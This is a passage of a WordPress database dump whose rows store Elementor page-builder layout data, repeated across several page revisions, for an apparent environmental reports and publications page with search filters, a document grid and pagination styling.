settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"},{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filters\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(30049,4197,'_elementor_pro_version','3.3.6'),(30051,4198,'_elementor_edit_mode','builder'),(30052,4198,'_elementor_template_type','wp-page'),(30053,4198,'_elementor_version','3.4.1'),(30054,4198,'_wp_page_template','default'),(30055,4198,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"},{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filters\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(30057,4198,'_elementor_pro_version','3.3.6'),(30059,4199,'_elementor_edit_mode','builder'),(30060,4199,'_elementor_template_type','wp-page'),(30061,4199,'_elementor_version','3.4.1'),(30062,4199,'_wp_page_template','default'),(30063,4199,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"},{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filters\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(30065,4199,'_elementor_pro_version','3.3.6'),(30068,4200,'_elementor_edit_mode','builder'),(30069,4200,'_elementor_template_type','wp-page'),(30070,4200,'_elementor_version','3.4.1'),(30071,4200,'_wp_page_template','default'),(30072,4200,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"},{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filters\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(30074,4200,'_elementor_pro_version','3.3.6'),(30075,4201,'_elementor_edit_mode','builder'),(30076,4201,'_elementor_template_type','wp-page'),(30077,4201,'_elementor_version','3.4.1'),(30078,4201,'_wp_page_template','default'),(30079,4201,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"},{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filters\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(30081,4201,'_elementor_pro_version','3.3.6'),(30082,4202,'_elementor_edit_mode','builder'),(30083,4202,'_elementor_template_type','wp-page'),(30084,4202,'_elementor_version','3.4.1'),(30085,4202,'_wp_page_template','default'),(30086,4202,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related 